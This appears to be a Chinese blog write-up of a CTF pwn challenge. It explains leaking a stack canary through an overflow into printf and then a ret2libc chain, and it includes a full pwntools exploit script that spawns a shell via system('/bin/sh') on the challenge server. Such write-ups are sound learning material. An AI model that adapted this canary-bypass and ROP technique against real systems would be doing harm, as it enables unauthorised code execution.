最近比较忙,这道题用了好长时间来debug,甚至贡献了第一次在csdn上提问。。。
目录
前言
一、题目重述&思路分析
二、exp
三、Canary
四、萌新遇到的困难
总结
前言
Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。
一、题目重述&思路分析
典型存在栈溢出,程序开启了Canary保护。
程序有两次输入,都存在栈溢出。
printf有点格式化字符串漏洞的意思在里面,主要关心的就是%s打印data(地址)存储的值。在这里呢,就是把buf数组——更确切地说是buf首地址开始的字符串进行打印——如果我们写大量的数据覆写掉buf数组长度的字符串的结尾标志,那么下一行printf就可以泄露大量的栈上信息——泄露出我们的Canary
然后我们就可以通过第二个进行泄露libc,再劫持程序控制流到main,为再次进行栈溢出做准备。
主要的exp就作注释写在下方了。
二、exp
from pwn import *
from pwn import u64,p64# io=process("./littleof")
io=remote("node4.anna.nssctf.cn",28750)
elf=ELF("./littleof")context(arch="amd64",os='linux',log_level='debug')#payload1:准备泄露canary
payload1=b'a'*(0x50-0x9)+b'b' #构造尾部不同的垃圾数据,使得能够定位到最后
io.recvuntil(b'overflow?')
io.sendline(payload1); #注意,最后发了个回车,对应\x0a需要剪掉
io.recvuntil(b'ab') #定位到canary之前
canary=u64(io.recv(8)) #接收canary,但是勿忘回车
canary=canary-0x0a #减去回车
print('canary:',hex(canary))pop_rdi_ret_addr=0x400863
ret_addr=0x40059e #ret只是为了将system抬高4字节,具体可以看我的另一篇博客#https://blog.csdn.net/Mr_Fmnwon/article/details/130959123?spm=1001.2014.3001.5501
puts_plt=elf.plt['puts']
main_addr=0x400789
puts_got=elf.got["puts"]print("puts_plt:",hex(puts_plt))
print("plt_got:",hex(puts_got))#payload2:泄露libc
payload2=b'a'*(0x50-8)+p64(canary)+b'a'*8 #绕过canary保护的垃圾数据
payload2+=p64(pop_rdi_ret_addr)+p64(puts_got) #pop rdi来设置puts的参数
payload2+=p64(puts_plt) #调用puts函数
payload2+=p64(main_addr) #返回有效地址且再次进行栈溢出io.sendlineafter(b'Try harder!',payload2)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00')) #获取puts真实地址
print("real addr:",hex(puts_addr))from LibcSearcher import *
#--------------------------------ret2libc---------------------------#
libc=LibcSearcher("puts",puts_addr)
base=puts_addr-libc.dump('puts')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
#-------------------------------------------------------------------##payload3:构造调用system("/bin/sh")
io.recvuntil(b'overflow?')
payload3=b'a'*(0x50-8)+p64(canary)+b'a'*8
payload3+=p64(ret_addr)
payload3+=p64(pop_rdi_ret_addr)+p64(bin_sh)
payload3+=p64(system)
payload3+=p64(main_addr)io.sendline(payload3)
io.interactive()
三、Canary
作为萌新,也是通过许多资源才了解到一些知识,放到这里也方便读者
Canary学习(泄露Canary)_西杭的博客-CSDN博客
Canary学习(爆破Canary)_funcanary_西杭的博客-CSDN博客
四、萌新遇到的困难
为什么一道题熬了很久呢?因为最近换了台电脑,也在试/配环境
因为对比其他师傅的exp,一模一样,但是他们可以跑通,我不行,而且报错。。。
无奈只好去提问
新电脑环境,python关于转义字符的报错-编程语言-CSDN问答
报错在转义符,还以为是环境配置的原因。通过尝试运行其他师傅的代码,发现没有任何问题。然后就逐字逐句对比,发现了影响我的代码的一点差异——字符串对齐
str.ljust(8,"\x00")
str.rjust(8,"\x00")
如果读者有兴趣找找网上其他的本题的exp,可能会发现有的人用rjust,有的人用ljust,有的人两者都用。
——左对齐,右对齐。什么时候左对齐,什么时候右对齐呢?在这一点上不确定,我想,是对获取信息的格式/长度/大小端序的相关知识并不明确。而网上的资源也太少了,或许是我没找到。如果有大佬能够讲讲,recv(num1).l/rjust(num2,"\x00")以及num1该如何选取该多好啊!
此外sendline会在结尾发送一个回车,作为萌新,勿忘!
总结
不断总结,不断求学